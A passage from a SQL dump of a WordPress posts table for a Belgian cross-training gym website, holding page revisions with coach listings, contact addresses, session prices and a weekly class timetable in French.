wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 15:07:42', '2013-06-16 15:07:42', '', 20, 'http://www.crosstrainingcenter.be/?p=141', 0, 'revision', '', 0),
(142, 1, '2014-02-09 20:26:00', '2014-02-09 20:26:00', '<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\n<h1>Limelette</h1>\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\n\n<address>Club Justine Henin\nAvenue Léon Fournet, 20\n1342 Limelette</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\n<h1>Namur</h1>\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\n\n<address>Bowling et Squash de Namur\nChaussée de Perwez, 251\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\n</tr>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\n<h1></h1>\n<h1>Laissez-nous un message :</h1>\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\n<h1></h1>\n<h1>Prise de RDV :</h1>\nLes réservations de Team Training se font en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\nLes séances le Duo Training, Personnal\nTraining ou Coaching nutritionnel se\nfont exclusivement par téléphone.\n0485 / 92 . 02 . 12\n<h1></h1>\n</td>\n</tr>\n</tbody>\n</table>\n<h1></h1>\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'inherit', 'open', 'open', '', '9-autosave-v1', '', '', '2014-02-09 20:26:00', '2014-02-09 20:26:00', '', 9, 'http://www.crosstrainingcenter.be/?p=142', 0, 'revision', '', 0),
(144, 1, '2013-06-16 15:13:28', '2013-06-16 15:13:28', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n\r\n<h1>Adresse :</h2>\r\nChaussée de Perwez 251\r\n5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a>\r\n\r\n<h1>Plan d\'accès :</h1>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-06-16 15:13:28', '2013-06-16 15:13:28', '', 9, 'http://www.crosstrainingcenter.be/?p=144', 0, 'revision', '', 0),
(143, 1, '2013-06-02 17:55:41', '2013-06-02 17:55:41', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 04XX/XX.XX.XX\r\n\r\nLorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper.', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-06-02 17:55:41', '2013-06-02 17:55:41', '', 9, 'http://www.crosstrainingcenter.be/?p=143', 0, 'revision', '', 0),
(145, 1, '2013-06-16 14:47:43', '2013-06-16 14:47:43', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:47:43', '2013-06-16 14:47:43', '', 11, 'http://www.crosstrainingcenter.be/?p=145', 0, 'revision', '', 0),
(146, 1, '2013-06-23 13:16:35', '2013-06-23 13:16:35', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Prix :</h2>\r\n\r\n[table]\r\nYear,Make,Model,Length\r\n1997,Ford,E350,2.34\r\n2000,Mercury,Cougar,2.38\r\n[/table]\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-23 13:16:35', '2013-06-23 13:16:35', '', 11, 'http://www.crosstrainingcenter.be/?p=146', 0, 'revision', '', 0),
(147, 1, '2013-06-23 13:18:02', '2013-06-23 13:18:02', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Prix :</h2>\r\n\r\n[table caption=\"Just test table\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nno,head1,head2,head3,head4\r\n1,row1col1,row1col2,row1col3,100\r\n2,row2col1,row2col2,row2col3,20000\r\n3,row3col1,,row3col3,1405\r\n4,row4col1,row4col2,row4col3,23023\r\n[/table]	\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-23 13:18:02', '2013-06-23 13:18:02', '', 11, 'http://www.crosstrainingcenter.be/?p=147', 0, 'revision', '', 0),
(148, 1, '2013-07-03 13:56:11', '2013-07-03 13:56:11', '', 'Julie Pierrard', '', 'publish', 'closed', 'closed', '', '148', '', '', '2013-07-03 14:13:21', '2013-07-03 14:13:21', '', 0, 'http://www.crosstrainingcenter.be/?post_type=collaborateur&#038;p=148', 0, 'collaborateur', '', 0),
(150, 1, '2013-07-03 13:59:47', '2013-07-03 13:59:47', '', 'Mathieu Gille', '', 'publish', 'closed', 'closed', '', '150', '', '', '2013-07-03 14:13:07', '2013-07-03 14:13:07', '', 0, 'http://www.crosstrainingcenter.be/?post_type=collaborateur&#038;p=150', 0, 'collaborateur', '', 0),
